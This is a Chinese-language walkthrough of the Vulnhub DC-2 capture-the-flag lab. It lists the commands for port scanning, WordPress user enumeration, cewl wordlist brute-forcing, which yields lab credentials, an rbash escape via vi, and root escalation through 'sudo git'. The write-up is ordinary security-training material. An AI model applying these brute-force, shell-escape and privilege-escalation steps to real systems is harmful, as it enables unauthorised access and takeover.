天天看點

Vulnhub靶場----2、DC-2

文章目錄

    • 一、環境搭建
    • 二、滲透流程
    • 三、思路總結

一、環境搭建

DC-2下載下傳位址:https://download.vulnhub.com/dc/DC-2.zip

kali:192.168.144.148

DC-2:192.168.144.150

添加hosts檔案:192.168.144.150 DC-2

Vulnhub靶場----2、DC-2
Vulnhub靶場----2、DC-2

二、滲透流程

nmap -A -T5 -sV -sT -p- 192.168.144.150

開放端口:80(web)、 7744(ssh)
Vulnhub靶場----2、DC-2
通路:192.168.144.150,web頁面擷取到flag1
Vulnhub靶場----2、DC-2
Vulnhub靶場----2、DC-2
flag1提示使用

cewl工具

進行暴力破解

進行目錄掃描,擷取到背景登入位址:

http://dc-2/wp-admin

使用

wpscan

對wordpress使用者進行枚舉:

wpscan --url http://dc-2 -e u

擷取到三個使用者:admin、jerry、tom
Vulnhub靶場----2、DC-2
利用cewl工具生成密碼字典:

cewl http://dc-2 -w passwd.txt

Vulnhub靶場----2、DC-2
生成使用者字典:

vim user1.txt

Vulnhub靶場----2、DC-2
使用wpscan進行爆破:

wpscan --url http://dc-2 -U user1.txt -P passwd.txt

Vulnhub靶場----2、DC-2
擷取到了

jerry:adipiscing

tom: parturient

,登入背景,擷取到flag2
Vulnhub靶場----2、DC-2
Vulnhub靶場----2、DC-2
flag2提示,如果此路不通,嘗試另一種方法,嘗試7744端口

ssh連接配接

tom登入成功

Vulnhub靶場----2、DC-2
執行

ls指令

,發現flag3
Vulnhub靶場----2、DC-2

rbash

限制,cat無法執行,vim無法執行,

vi可以執行

Vulnhub靶場----2、DC-2
Vulnhub靶場----2、DC-2

flag3提示可以嘗試切換一下使用者

使用vi突破rbash

vi

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

su jerry

成功切換到jerry
Vulnhub靶場----2、DC-2
成功通路到

flag4

Vulnhub靶場----2、DC-2
檢視是否有可以提權的指令:

find / -perm -u=s -type f 2>/dev/null

Vulnhub靶場----2、DC-2

sudo -l

:發現git可以利用,flag4也提示了可以使用git
Vulnhub靶場----2、DC-2

sudo git help config

:進入文本模式

!/bin/bash

:擷取shell
Vulnhub靶場----2、DC-2
擷取最後的

final-flag.txt

Vulnhub靶場----2、DC-2

三、思路總結

1、nmap端口掃描,添加hosts檔案,通路web頁面;
2、dirb目錄掃描擷取背景登入位址;
3、cewl暴力破解擷取背景登入賬戶;
4、ssh遠端連接配接;
5、vi突破rbash切換使用者;
6、git提權;
           

參考連結:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2